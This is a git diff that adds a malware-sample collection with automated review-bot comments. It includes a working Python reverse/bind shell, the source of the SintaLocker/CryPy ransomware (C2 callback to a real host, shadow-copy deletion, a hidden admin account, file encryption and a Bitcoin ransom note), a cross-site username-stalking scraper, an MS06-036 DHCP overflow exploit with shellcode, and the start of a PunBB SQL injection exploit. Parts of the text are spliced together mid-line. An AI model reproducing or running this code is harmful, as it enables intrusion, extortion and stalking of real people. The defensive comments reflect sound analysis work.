diff --git a/Python/AngstStealer.7z b/Python/AngstStealer.7z new file mode 100644 index 00000000..a03f5e35 Binary files /dev/null and b/Python/AngstStealer.7z differ diff --git a/Python/Aris.7z b/Python/Aris.7z new file mode 100644 index 00000000..8c7d1bdb Binary files /dev/null and b/Python/Aris.7z differ diff --git a/Python/Backdoor.Python.RShell b/Python/Backdoor.Python.RShell new file mode 100644 index 00000000..3c57bd43 --- /dev/null +++ b/Python/Backdoor.Python.RShell 
@@ -0,0 +1,121 @@ +#!/usr/bin/env python + +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # +# d00r.py 0.3a (reverse|bind)-shell in python by fQ # +# # +# alpha # +# # +# # +# usage: # +# % ./d00r -b password port # +# % ./d00r -r password port host # +# % nc host port # +# % nc -l -p port (please use netcat) # +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # + + +import os, sys, socket, time + + +# =================== var ======= +MAX_LEN=1024 +SHELL="/bin/zsh -c" +TIME_OUT=300 #s +PW="" +PORT="" +HOST="" + + +# =================== funct ===== +# shell - exec command, return stdout, stderr; improvable +def shell(cmd): + sh_out=os.popen(SHELL+" "+cmd).readlines() + nsh_out="" + for i in range(len(sh_out)): + nsh_out+=sh_out[i] + return nsh_out + +# action? +def action(conn): + conn.send("\nPass?\n") + try: pw_in=conn.recv(len(PW)) + except: print "timeout" + else: + if pw_in == PW: + conn.send("j00 are on air!\n") + while True: + conn.send(">>> ") + try: + pcmd=conn.recv(MAX_LEN) + except: + print "timeout" + return True + else: + #print "pcmd:",pcmd + cmd=""#pcmd + for i in range(len(pcmd)-1): + cmd+=pcmd[i] + if cmd==":dc": + return True + elif cmd==":sd": + return False + else: + if len(cmd)>0: + out=shell(cmd) + conn.send(out) + + +# =================== main ====== +argv=sys.argv + +if len(argv)<4: + print "error; help: head -n 16 d00r.py" + sys.exit(1) +elif argv[1]=="-b": + PW=argv[2] + PORT=argv[3] +elif argv[1]=="-r" and len(argv)>4: + PW=argv[2] + PORT=argv[3] + HOST=argv[4] +else: exit(1) + +PORT=int(PORT) +print "PW:",PW,"PORT:",PORT,"HOST:",HOST + +#sys.argv[0]="d00r" + +# exit father proc +if os.fork()!=0: + sys.exit(0) + +# associate the socket +sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.settimeout(TIME_OUT) + +if argv[1]=="-b": + sock.bind(('localhost', PORT)) + sock.listen(0) + +run=True +while run: + + if argv[1]=="-r": + try: sock.connect( (HOST, PORT) ) + except: + print "host unreachable" + time.sleep(5) + 
else: run=action(sock) + else: + try: (conn,addr)=sock.accept() + except: + print "timeout" + time.sleep(1) + else: run=action(conn) + + # shutdown the sokcet + if argv[1]=="-b": conn.shutdown(2) + else: + try: sock.send("") + except: time.sleep(1) + else: sock.shutdown(2) \ No newline at end of file diff --git a/Python/CryPy_Source.py b/Python/CryPy_Source.py new file mode 100644 index 00000000..394a922d --- /dev/null +++ b/Python/CryPy_Source.py 
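Review bot: Backdoor.Python.RShell is committed as plaintext Python while the samples added alongside it (AngstStealer.7z, Aris.7z) are archived, and the same applies to CryPy_Source.py, the unnamed social-media script that follows it, Exploit.Python.Ms06-036.a, Exploit.Python.PunBB.a and Kirk_ransomware.py; a plaintext sample is likely to be quarantined by endpoint scanners on checkout and can be run by accident, so store every sample the way the archives are stored. None of the added files carries a provenance header (origin, collection date, SHA-256, target interpreter), which is the first thing an analyst needs; add one per sample and state that this one is Python 2 (`print "timeout"` statements). The host-level indicators for this sample are all visible in the hunk: it daemonises with `os.fork()`, keeps a TCP socket with `sock.settimeout(TIME_OUT)` of 300 s, and runs every received line through `os.popen(SHELL+" "+cmd)` with `SHELL="/bin/zsh -c"`, so a python process holding a long-lived socket and spawning zsh children is what a detection should key on; note this in the header rather than leaving it to be rediscovered.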
@@ -0,0 +1,463 @@ +import os, fnmatch, struct, random, string, base64, platform, sys, time, socket, json, urllib, ctypes, urllib2 +import SintaRegistery +import SintaChangeWallpaper +from Crypto import Random +from Crypto.Cipher import AES +rmsbrand = 'SintaLocker' +newextns = 'sinta' +encfolder = '__SINTA I LOVE YOU__' +email_con = 'sinpayy@yandex.com' +btc_address = '1NEdFjQN74ZKszVebFum8KFJNd9oayHFT1' +userhome = os.path.expanduser('~') +my_server = 'http://www.dobrebaseny.pl/js/lib/srv/' +wallpaper_link = 'http://wallpaperrs.com/uploads/girls/thumbs/mood-ravishing-hd-wallpaper-142943312215.jpg' +victim_info = base64.b64encode(str(platform.uname())) +configurl = my_server + 'api.php?info=' + victim_info + '&ip=' + base64.b64encode(socket.gethostbyname(socket.gethostname())) +glob_config = None +try: + glob_config = json.loads(urllib.urlopen(configurl).read()) + if set(glob_config.keys()) != set(['MRU_ID', 'MRU_UDP', 'MRU_PDP']): + raise Exception('0x00001') +except IOError: + time.sleep(1) + +victim_id = glob_config[u'MRU_ID'] +victim_r = glob_config[u'MRU_UDP'] +victim_s = glob_config[u'MRU_PDP'] +try: + os.system('bcdedit /set {default} recoveryenabled No') + os.system('bcdedit /set {default} bootstatuspolicy ignoreallfailures') + os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f') + os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f') + os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f') + os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f') +except WindowsError: + pass + +def setWallpaper(imageUrl): + try: + wallpaper = SintaChangeWallpaper.ChangeWallpaper() + wallpaper.downloadWallpaper(imageUrl) + except: + pass + + +def persistance(): + try: + 
SintaRegistery.addRegistery(os.path.realpath(__file__)) + except: + pass + + +def destroy_shadow_copy(): + try: + os.system('vssadmin Delete Shadows /All /Quiet') + except: + pass + + +def create_remote_desktop(): + try: + os.system('REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f') + os.system('net user ' + victim_r + ' ' + victim_s + ' /add') + os.system('net localgroup administrators ' + victim_r + ' /add') + except: + pass + + +def write_instruction(dir, ext): + try: + files = open(dir + '\\README_FOR_DECRYPT.' + ext, 'w') + files.write('! ! ! OWNED BY ' + rmsbrand + ' ! ! !\r\n\r\nAll your files are encrypted by ' + rmsbrand + ' with strong chiphers.\r\nDecrypting of your files is only possible with the decryption program, which is on our secret server.\r\nAll encrypted files are moved to ' + encfolder + ' directory and renamed to unique random name.\r\nTo receive your decryption program send $100 USD Bitcoin to address: ' + btc_address + '\r\nContact us after you send the money: ' + email_con + '\r\n\r\nJust inform your identification ID and we will give you next instruction.\r\nYour personal identification ID: ' + victim_id + '\r\n\r\nAs your partner,\r\n\r\n' + rmsbrand + '') + except: + pass + + +def delete_file(filename): + try: + os.remove(filename) + except: + pass + + +def find_files(root_dir): + write_instruction(root_dir, 'md') + extentions = ['*.txt', + '*.exe', + '*.php', + '*.pl', + '*.7z', + '*.rar', + '*.m4a', + '*.wma', + '*.avi', + '*.wmv', + '*.csv', + '*.d3dbsp', + '*.sc2save', + '*.sie', + '*.sum', + '*.ibank', + '*.t13', + '*.t12', + '*.qdf', + '*.gdb', + '*.tax', + '*.pkpass', + '*.bc6', + '*.bc7', + '*.bkp', + '*.qic', + '*.bkf', + '*.sidn', + '*.sidd', + '*.mddata', + '*.itl', + '*.itdb', + '*.icxs', + '*.hvpl', + '*.hplg', + '*.hkdb', + '*.mdbackup', + '*.syncdb', + '*.gho', + '*.cas', + '*.svg', + '*.map', + '*.wmo', + '*.itm', + '*.sb', + '*.fos', + 
'*.mcgame', + '*.vdf', + '*.ztmp', + '*.sis', + '*.sid', + '*.ncf', + '*.menu', + '*.layout', + '*.dmp', + '*.blob', + '*.esm', + '*.001', + '*.vtf', + '*.dazip', + '*.fpk', + '*.mlx', + '*.kf', + '*.iwd', + '*.vpk', + '*.tor', + '*.psk', + '*.rim', + '*.w3x', + '*.fsh', + '*.ntl', + '*.arch00', + '*.lvl', + '*.snx', + '*.cfr', + '*.ff', + '*.vpp_pc', + '*.lrf', + '*.m2', + '*.mcmeta', + '*.vfs0', + '*.mpqge', + '*.kdb', + '*.db0', + '*.mp3', + '*.upx', + '*.rofl', + '*.hkx', + '*.bar', + '*.upk', + '*.das', + '*.iwi', + '*.litemod', + '*.asset', + '*.forge', + '*.ltx', + '*.bsa', + '*.apk', + '*.re4', + '*.sav', + '*.lbf', + '*.slm', + '*.bik', + '*.epk', + '*.rgss3a', + '*.pak', + '*.big', + '*.unity3d', + '*.wotreplay', + '*.xxx', + '*.desc', + '*.py', + '*.m3u', + '*.flv', + '*.js', + '*.css', + '*.rb', + '*.png', + '*.jpeg', + '*.p7c', + '*.p7b', + '*.p12', + '*.pfx', + '*.pem', + '*.crt', + '*.cer', + '*.der', + '*.x3f', + '*.srw', + '*.pef', + '*.ptx', + '*.r3d', + '*.rw2', + '*.rwl', + '*.raw', + '*.raf', + '*.orf', + '*.nrw', + '*.mrwref', + '*.mef', + '*.erf', + '*.kdc', + '*.dcr', + '*.cr2', + '*.crw', + '*.bay', + '*.sr2', + '*.srf', + '*.arw', + '*.3fr', + '*.dng', + '*.jpeg', + '*.jpg', + '*.cdr', + '*.indd', + '*.ai', + '*.eps', + '*.pdf', + '*.pdd', + '*.psd', + '*.dbfv', + '*.mdf', + '*.wb2', + '*.rtf', + '*.wpd', + '*.dxg', + '*.xf', + '*.dwg', + '*.pst', + '*.accdb', + '*.mdb', + '*.pptm', + '*.pptx', + '*.ppt', + '*.xlk', + '*.xlsb', + '*.xlsm', + '*.xlsx', + '*.xls', + '*.wps', + '*.docm', + '*.docx', + '*.doc', + '*.odb', + '*.odc', + '*.odm', + '*.odp', + '*.ods', + '*.odt', + '*.sql', + '*.zip', + '*.tar', + '*.tar.gz', + '*.tgz', + '*.biz', + '*.ocx', + '*.html', + '*.htm', + '*.3gp', + '*.srt', + '*.cpp', + '*.mid', + '*.mkv', + '*.mov', + '*.asf', + '*.mpeg', + '*.vob', + '*.mpg', + '*.fla', + '*.swf', + '*.wav', + '*.qcow2', + '*.vdi', + '*.vmdk', + '*.vmx', + '*.gpg', + '*.aes', + '*.ARC', + '*.PAQ', + '*.tar.bz2', + '*.tbk', + '*.bak', 
+ '*.djv', + '*.djvu', + '*.bmp', + '*.cgm', + '*.tif', + '*.tiff', + '*.NEF', + '*.cmd', + '*.class', + '*.jar', + '*.java', + '*.asp', + '*.brd', + '*.sch', + '*.dch', + '*.dip', + '*.vbs', + '*.asm', + '*.pas', + '*.ldf', + '*.ibd', + '*.MYI', + '*.MYD', + '*.frm', + '*.dbf', + '*.SQLITEDB', + '*.SQLITE3', + '*.asc', + '*.lay6', + '*.lay', + '*.ms11 (Security copy)', + '*.sldm', + '*.sldx', + '*.ppsm', + '*.ppsx', + '*.ppam', + '*.docb', + '*.mml', + '*.sxm', + '*.otg', + '*.slk', + '*.xlw', + '*.xlt', + '*.xlm', + '*.xlc', + '*.dif', + '*.stc', + '*.sxc', + '*.ots', + '*.ods', + '*.hwp', + '*.dotm', + '*.dotx', + '*.docm', + '*.DOT', + '*.max', + '*.xml', + '*.uot', + '*.stw', + '*.sxw', + '*.ott', + '*.csr', + '*.key', + 'wallet.dat'] + for dirpath, dirs, files in os.walk(root_dir): + if 'Windows' not in dirpath: + for basename in files: + for ext in extentions: + if fnmatch.fnmatch(basename, ext): + filename = os.path.join(dirpath, basename) + yield filename + + +def make_directory(file_path): + directory = file_path + '' + encfolder + if not os.path.exists(directory): + try: + os.makedirs(directory) + except: + pass + + +def text_generator(size = 6, chars = string.ascii_uppercase + string.digits): + return ''.join((random.choice(chars) for _ in range(size))) + '.' 
+ newextns + + +def generate_file(file_path, filename): + make_directory(file_path) + key = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(32) ]) + newfilename = file_path + '\\' + encfolder + '\\' + text_generator(36, '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm') + try: + encrypt_file(key, filename, newfilename) + except: + pass + + +def encrypt_file(key, in_filename, newfilename, out_filename = None, chunksize = 65536, Block = 16): + if not out_filename: + out_filename = newfilename + iv = ''.join((chr(random.randint(0, 255)) for i in range(16))) + encryptor = AES.new(key, AES.MODE_CBC, iv) + filesize = os.path.getsize(in_filename) + with open(in_filename, 'rb') as infile: + with open(out_filename, 'wb') as outfile: + outfile.write(struct.pack(' 1: + global urls_stalk + pastebin_url = "https://pastebin.com/u/" + user + pastebin_str = "s Pastebin - Pastebin.com" + patreon_url = "https://www.patreon.com/" + user + patreon_str = 'created_at' + gutefrage_url = "https://www.gutefrage.net/nutzer/" + user + gutefrage_str = '' + facebook_url = 'https://facebook.com/' + user + facebook_str = ' hreflang="sv" href="https://sv-se.facebook.com/' + user + instagram_url = "https://www.instagram.com/" + user + "/" + instagram_str = '' + steam_url = "https://steamcommunity.com/id/" + user + steam_str = 'https://steamcommunity-a.akamaihd.net/public/images/skin_1/arrowDn9x5.gif' + twitch_url = "https://www.twitch.tv/" + user + twitch_str = "content='twitch://stream/" + user + lachschon_url = "https://www.lachschon.de/community/user/" + user + "/" + lachschon_str = '' + + URLS = [pastebin_url, patreon_url, gutefrage_url, ebay_url, facebook_url, twitter_url, instagram_url, steam_url, twitch_url, lachschon_url] + STRS = [pastebin_str, patreon_str, gutefrage_str, ebay_str, facebook_str, twitter_str, instagram_str, steam_str, twitch_str, lachschon_str] + + for i in range(0, len(URLS)): + html = getResponse(URLS[i]) + if STRS[i].lower() 
in str(html).lower(): + print("\t> " + URLS[i]) + urls_stalk.append(URLS[i]) + +def get_twitter_img(user): + url = "https://twitter.com/" + user + html = subprocess.getoutput("phantomjs html.js " + url) + image = find_between(html, '')
+    r = requests.get(image)
+    with open('Twitter.jpg', 'wb') as f:
+        f.write(r.content)
+
+def get_instagram_img(user):
+    data = {
+    'username': user,
+    'submit': 'View DP'
+    }
+    response = requests.post('https://fullinstadp.com/index.php', data=data)
+    html = response.text
+    f = open(https?://[^\s]+)", word).group("url") + if '//t.co/' in url: + last = url[-1:] + if last == ".": + url = url.rstrip('.') + r = requests.get(url) + url = r.url + urls.append(url) + except: + e = "" + +def check_string_socialmedia(string): + global social_media + count = 0 + next = 0 + for word in string.split(" "): + next = count + 2 + if 'facebook' in word.lower(): + print(string.split(" ")[next]) + count +=1 + +def youtube(url): + url = url + "/about" + html = subprocess.getoutput("phantomjs html.js " + url) + tmp_str = html.split('"}},"urlEndpoint":') + for url in tmp_str: + #print(url) + url = find_between(url, '{"url":"', '","target":') + print(html) + +def grab_instagram(profile): + global done_checks + global urls + global instagram + global usernames + global compare + if not "instagram: " + profile in done_checks: + if not profile in usernames: + usernames.append(profile) + url = "https://www.instagram.com/" + profile + "/" + html = subprocess.getoutput("phantomjs html.js " + url) + if '"@type":"Person","name":"' in html: + display_name = find_between(html, '"@type":"Person","name":"', '","alternateName":"') + if not display_name in usernames: + usernames.append(display_name) + if not "instagram: " + display_name in done_checks: + print(display_name) + stalk(display_name) + instagram.append("Display Name: " + display_name) + description = find_between(html, '"user":{"biography":"', '","blocked_by_viewer') + follower = find_between(html, 'edge_followed_by":{"count":', '},"followed_by_viewer') + check_string_mail(description) + check_string_url(description) + instagram.append("Description: " + description) + instagram.append("Follower: " + follower) + #get_instagram_img(profile) // Buggy suche nach Alternative zu siehe Funktion + compare = True + if not "instagram: " + profile in done_checks: + done_checks.append("instagram: " + profile) + +def grab_steam(url): + global done_checks + global urls + global usernames + if not "steam: " + profile in 
done_checks: + url = url + "/ajaxaliases/" + response = requests.get(url) + html = response.text + for item in html.split("newname"): + username = find_between(item, '":"', '","timechanged') + if not username in usernames: + usernames.append(username) + + + +def grab_twitter(profile): + global done_checks + global urls + global adresse + global usernames + global twitter + global first_dl + if not "twitter: " + profile in done_checks: + url = "https://twitter.com/" + profile + urls.append(url) + html = subprocess.getoutput("phantomjs html.js " + url) + #variables + display_name = find_between(html, '', ' (@') + if not profile in usernames: + usernames.append(profile) + if not display_name in usernames: + usernames.append(display_name) + if not "twitter: " + display_name in done_checks: + print(display_name) + stalk(display_name) + join_date = find_between(html, 'ProfileHeaderCard-joinDateText js-tooltip u-dir" dir="ltr" title="', '">Beigetreten') + description = "" + url = "" + location = "" + #if + if '<meta name="description"' in html: + description = find_between(html, '<meta name="description" content="', '">') + description = description.replace(""", "") + check_string_mail(description) + check_string_url(description) + if '<span class="ProfileHeaderCard-urlText u-dir"> <a class="u-textUserColor"' in html: + tmp = find_between(html, '<span class="ProfileHeaderCard-urlText u-dir">', '</a>') + url = find_between(tmp, '" title="', '">') + urls.append(url) + if 'location":"' in html: + location = find_between(html, '"location":"', '","url') + if len(location) > 0: + adresse = location + twitter.append("Display Name: " + display_name) + twitter.append("Join Date: " + join_date) + twitter.append("Description: " + description) + twitter.append("URL: " + url) + twitter.append("Location: " + location) + twitter.append(" ") + #if first_dl == False: + #get_twitter_img(profile) + #first_dl = True + if not "twitter: " + profile in done_checks: + 
done_checks.append("twitter: " + profile) + + + +def handle(): + try: + if sys.argv[1]: + social_media = sys.argv[1].lower() + if sys.argv[2]: + info_type = sys.argv[2].lower() + if sys.argv[3]: + infos = sys.argv[3].lower() + if info_type == "url": + if social_media == "youtube": + youtube(infos) + elif info_type == "profile": + if social_media == "twitter": + grab_twitter(infos) + elif info_type == "user": + if social_media == "stalk": + stalk(infos) + except Exception as e: + print(e) + +def find_between( s, first, last ): + try: + start = s.index( first ) + len( first ) + end = s.index( last, start ) + return s[start:end] + except ValueError: + return "" + +def getResponse(url): + response = requests.get(url) + #response.raise_for_status() + data = response.content + return data + + + +handle() + +for url in urls_stalk: + #print(url) + if 'twitter.com' in url: + checked = False + profile = url.split("/")[3] + for check in done_checks: + if check == "twitter: " + profile: + checked = True + if not checked: + grab_twitter(profile) + done_checks.append("twitter:" + profile) + + if 'instagram.com' in url: + checked = False + profile = url.split("/")[3] + for check in done_checks: + if check == "instagram: " + profile: + checked = True + if not checked: + grab_instagram(profile) + #print("Download Profile Picture") + done_checks.append("instagram: " + profile) + #Steam Check direkt in der Stalk Funktion + if 'steamcommunity.com' in url: + checked = False + profile = url.split("/")[4] + for check in done_checks: + if check == "steam: " + profile: + checked = True + if not checked: + grab_steam(url) + done_checks.append("steam: " + profile) + + +print("------------------") +print("Usernames:") +print("------------------") +for user in usernames: + print(user) + stalk(user) + +if len(urls) > 0: + print("------------------") + print("URLs:") + print("------------------") + for url in urls: + print(url) + +if len(twitter) > 0: + print("------------------") + 
print("Twitter:") + print("------------------") + for item in twitter: + print(item) + +if len(instagram) > 0: + print("------------------") + print("Instagram:") + print("------------------") + for item in instagram: + print(item) + +if len(steam) > 0: + print("------------------") + print("Steam:") + print("------------------") + for item in steam: + print(item) + +print("------------------") +print("Sites checked:") +print("------------------") +for check in done_checks: + print(check) diff --git a/Python/Exploit.Python.Ms06-036.a b/Python/Exploit.Python.Ms06-036.a new file mode 100644 index 00000000..3dea8e3a --- /dev/null +++ b/Python/Exploit.Python.Ms06-036.a 
@@ -0,0 +1,237 @@ +#!/usr/bin/env python +# +# +# by redsand@blacksecurity.org +# this (like any thing) would not be possible w/out the bl4ck team. +# thanks guys. +# + +import sys, os + +sys.path.append("pydhcplib") + +from scapy import * + +from pydhcplib.dhcp_packet import * +from pydhcplib.dhcp_network import * +from pydhcplib.type_strlist import * +from pydhcplib.type_ipv4 import * +from pydhcplib.type_hw_addr import * + +inet_face = "vmnet8" + +default_ip = "10.31.33.7" + +# user bl4ck/bl4ck +# this exits via Thread (so thta we kill the dhcp thread in services.exe +# +# this means if services doesn't crash, it was a successful exploit +# +scode = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x13" \ +"\x43\x32\xa5\x83\xeb\xfc\xe2\xf4\xef\xab\x76\xa5\x13\x43\xb9\xe0" \ +"\x2f\xc8\x4e\xa0\x6b\x42\xdd\x2e\x5c\x5b\xb9\xfa\x33\x42\xd9\xec" \ +"\x98\x77\xb9\xa4\xfd\x72\xf2\x3c\xbf\xc7\xf2\xd1\x14\x82\xf8\xa8" \ +"\x12\x81\xd9\x51\x28\x17\x16\xa1\x66\xa6\xb9\xfa\x37\x42\xd9\xc3" \ +"\x98\x4f\x79\x2e\x4c\x5f\x33\x4e\x98\x5f\xb9\xa4\xf8\xca\x6e\x81" \ +"\x17\x80\x03\x65\x77\xc8\x72\x95\x96\x83\x4a\xa9\x98\x03\x3e\x2e" \ +"\x63\x5f\x9f\x2e\x7b\x4b\xd9\xac\x98\xc3\x82\xa5\x13\x43\xb9\xcd" \ +"\x2f\x1c\x03\x53\x73\x15\xbb\x5d\x90\x83\x49\xf5\x7b\xac\xfc\x45" \ +"\x73\x2b\xaa\x5b\x99\x4d\x65\x5a\xf4\x20\x5f\xc1\x3d\x26\x4a\xc0" \ +"\x33\x6c\x51\x85\x7d\x26\x46\x85\x66\x30\x57\xd7\x33\x21\x5e\x91" \ +"\x70\x28\x12\xc7\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x63\x14\x83" \ +"\x33\x2d\x57\xd1\x33\x2f\x5d\xc6\x72\x2f\x55\xd7\x7c\x36\x42\x85" \ +"\x52\x27\x5f\xcc\x7d\x2a\x41\xd1\x61\x22\x46\xca\x61\x30\x12\xc7" \ +"\x7f\x77\x51\xce\x33\x6c\x73\xe1\x57\x43\x32\xa5" + + + +netopt = {'client_listen_port':"68", + 'server_listen_port':"67", + 'listen_address':"0.0.0.0"} + + +def substr(i,o,off): + begin=i[:off] + end=i[off+len(o):] + ret=begin+o+end + return ret + +def io(i): + str="" + a=chr(i % 256) + i=i >> 8 + b=chr(i % 256) + i=i >> 8 + c=chr(i % 256) + i=i >> 8 + 
d=chr(i % 256) + + str+="%c%c%c%c" % (a,b,c,d) + + return str + +class Server(DhcpServer): + def __init__(self, options): + DhcpServer.__init__(self,options["listen_address"], + options["client_listen_port"], + options["server_listen_port"]) + + def HandleDhcpDiscover(self, packet): + my_reqip = '' + + my_reqip = default_ip + + sid_i = my_reqip.rfind(".") + server_ip = my_reqip[0:sid_i] + ".254" + + our_ip = my_reqip[0:sid_i] + ".2" + + mymac = hwmac(packet.GetHardwareAddress()).str() + print "** Received discover from %s (%s)" % (mymac,my_reqip) + + mpacket = DhcpPacket() + mpacket.CreateDhcpOfferPacketFrom(packet) + mpacket.SetOption("dhcp_message_type",[2]) + mpacket.SetOption("yiaddr", ipv4(my_reqip).list()) + mpacket.SetOption("siaddr", ipv4(server_ip).list()) + mpacket.SetOption("ip_address_lease_time",[0,0,7,8]) + mpacket.SetOption("flags",[0,0]) + mpacket.SetOption("server_identifier", ipv4(server_ip).list()) + mpacket.SetOption("subnet_mask", ipv4("255.255.255.0").list()) + mpacket.SetOption("domain_name_server", ipv4(our_ip).list()) + mpacket.SetOption("router",ipv4(our_ip).list()) + + mpacket.SetOption("domain_name",strlist( ( "N" * 255 )).list()) + + append = "\xfa\xff" + ( "\x90" * 0xff ) + append = "\xfa\xff" + ( "\x90" * 0xff ) + append = "\xfa\xff" + ( "\x90" * 0xff ) + append = "\xfa\xff" + ( "\x90" * 0xff ) + append = "\xfa\xff" + ( "\x90" * 0xff ) + + p = Ether(dst=mymac,src=get_if_hwaddr(inet_face))/IP(src=server_ip,dst="255.255.255.255",ttl=16)/UDP(sport=67,dport=68)/mpacket.EncodePacket('') + + print "** Sending DHCP Offer Packet to %s from %s" % (my_reqip,server_ip) + sendp(p, iface=inet_face, verbose=False) + + def HandleDhcpRequest(self, packet): + + + ip = packet.GetOption("request_ip_address") + sid = packet.GetOption("server_identifier") + ciaddr = packet.GetOption("ciaddr") + my_reqip = '' + try: + data = packet.options_data['request_ip_address'] + for i in range(0,len(data),4) : + if len(data[i:i+4]) == 4 : + my_reqip += 
ipv4(data[i:i+4]).str() + except: + my_reqip = default_ip + + mymac = hwmac(packet.GetHardwareAddress()).str() + print "** Received request from %s (%s)" % (my_reqip,mymac) + sid_i = my_reqip.rfind(".") + server_ip = my_reqip[0:sid_i] + ".254" + + our_ip = my_reqip[0:sid_i] + ".2" + + mypacket = DhcpPacket() + mypacket.CreateDhcpAckPacketFrom(packet) + mypacket.SetOption("yiaddr", ipv4(my_reqip).list()) + + dumbstr = "\x90" * 0xFF + + # we're looking for a jmp/call ebx ?! or landing in our codespace + # directly + + # C5 converts to 253C + # BB = 2557 + # AA = 00AC + # DD = 258C + # EE = 03B5 + # 88 = 00D6 + # 99 = 00EA + # F3 = 2591 + # B0 = 2264 + # 8F = 00c5 + + eipstr = ( "\xB9\x0b" * ( 254 / 2) ) + "\x64" + #eipstr = "C" * 0xFF + + + payload = "\x42" * 0xFF + payload = substr(payload, scode, 1) + + + ## find location in heap to ret2 + # find offset & append as many "\x26\x6e\x43\x6e" + # to increment ebx to a non trashed location (since ebx points to our code) + # then push ebx \x53 and \xc4 (retn) + # + # we're looking for a pop+pop+ret or a jmp/call ebx to return to our + # unicode filtered input + # note it must be iwthin the bounds of 0x0000**** - 0x0070**** + # or 0x22***** <-- wont help us + + append = "\x0f\xff" + ( "\x90" * 0xff ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( eipstr ) + append += "\xfa\xff" + ( eipstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( dumbstr ) + append += "\xfa\xff" + ( payload[0:254]) + "\x00" + + print "Length of our attack: %r" % len(append) + + eth = Ether(dst=mymac,src=get_if_hwaddr(inet_face)) + p = fragment(IP(src=server_ip,dst=my_reqip,ttl=16)/UDP(sport=67,dport=68)/mypacket.EncodePacket(append), 1024) + print "** Sending 
DHCP ACK response (len: %r) to %s from %s" % (len(append), my_reqip,server_ip) + for i in p: + sendp(eth/i, iface=inet_face, verbose=False) + + def HandleDhcpDecline(self, packet): + return + #print "** Dhcp Declined" + #packet.PrintHeaders() + #packet.PrintOptions() + + def HandleDhcpRelease(self, packet): + return + #packet.PrintHeaders() + #packet.PrintOptions() + + def HandleDhcpInform(self, packet): + return + #packet.PrintHeaders() + #packet.PrintOptions() + + + +print "[BL4CK] - MS06-036 DHCP Client Domain Name Overflow" +print "\t by redsand@blacksecurity.org" +print "Usage: %s [interface] [forced request ip]" % sys.argv[0] +print "" + + +if len(sys.argv) > 1: + inet_face = sys.argv[1] + +if len(sys.argv) > 2: + default_ip = sys.argv[2] + +print "Listening for client requests:\n" +print "Listening on interface: %s" % inet_face +print "Using default address: %s" % default_ip + +server = Server(netopt) + +while True : + server.GetNextDhcpPacket() diff --git a/Python/Exploit.Python.PunBB.a b/Python/Exploit.Python.PunBB.a new file mode 100644 index 00000000..7e050115 --- /dev/null +++ b/Python/Exploit.Python.PunBB.a 
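Review bot: The only reference to the vulnerability this sample reproduces is the banner string `MS06-036 DHCP Client Domain Name Overflow`; a header citing the bulletin and the affected client component would let a reader triage the file without executing anything. The network indicators are fully visible in the hunk and worth recording for detection: the script acts as a rogue DHCP server on `inet_face` (hard-coded to `vmnet8`), answers DISCOVER with an OFFER whose `domain_name` option is `"N" * 255`, and answers REQUEST with an ACK whose trailer is split through `fragment(..., 1024)`, so fragmented UDP 67→68 responses and an oversized option 15 value are the observable signature. The script depends on `from scapy import *` and a vendored `pydhcplib` that does not appear in this part of the diff; say so in the header so the sample is not mistaken for a self-contained file.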
@@ -0,0 +1,130 @@ +#!/usr/bin/python +####################################################################### +# _ _ _ _ ___ _ _ ___ +# | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ +# | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ +# |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| +# +####################################################################### +# Proof of concept code from the Hardened-PHP Project +####################################################################### +# +# -= PunBB 1.2.4 =- +# change_email SQL injection exploit +# +# user-supplied data within the database is still user-supplied data +# +####################################################################### + +import urllib +import getopt +import sys +import string + +__argv__ = sys.argv + +def banner(): + print "PunBB 1.2.4 - change_email SQL injection exploit" + print "Copyright (C) 2005 Hardened-PHP Project\n" + +def usage(): + banner() + print "Usage:\n" + print " $ ./punbb_change_email.py [options]\n" + print " -h http_url url of the punBB forum to exploit" + print " f.e. 
http://www.forum.net/punBB/" + print " -u username punBB forum useraccount" + print " -p password punBB forum userpassword" + print " -e email email address where the admin leve activation email is sent" + print " -d domain catch all domain to catch \"some-SQL-Query\"@domain emails" + print "" + sys.exit(-1) + +def main(): + try: + opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:") + except getopt.GetoptError: + usage() + + if len(__argv__) < 10: + usage() + + username = None + password = None + email = None + domain = None + host = None + for o, arg in opts: + if o == "-h": + host = arg + if o == "-u": + username = arg + if o == "-p": + password = arg + if o == "-e": + email = arg + if o == "-d": + domain = arg + + # Printout banner + banner() + + # Check if everything we need is there + if host == None: + print "[-] need a host to connect to" + sys.exit(-1) + if username == None: + print "[-] username needed to continue" + sys.exit(-1) + if password == None: + print "[-] password needed to continue" + sys.exit(-1) + if email == None: + print "[-] email address needed to continue" + sys.exit(-1) + if domain == None: + print "[-] catch all domain needed to continue" + sys.exit(-1) + + # Retrive cookie + params = { + 'req_username' : username, + 'req_password' : password, + 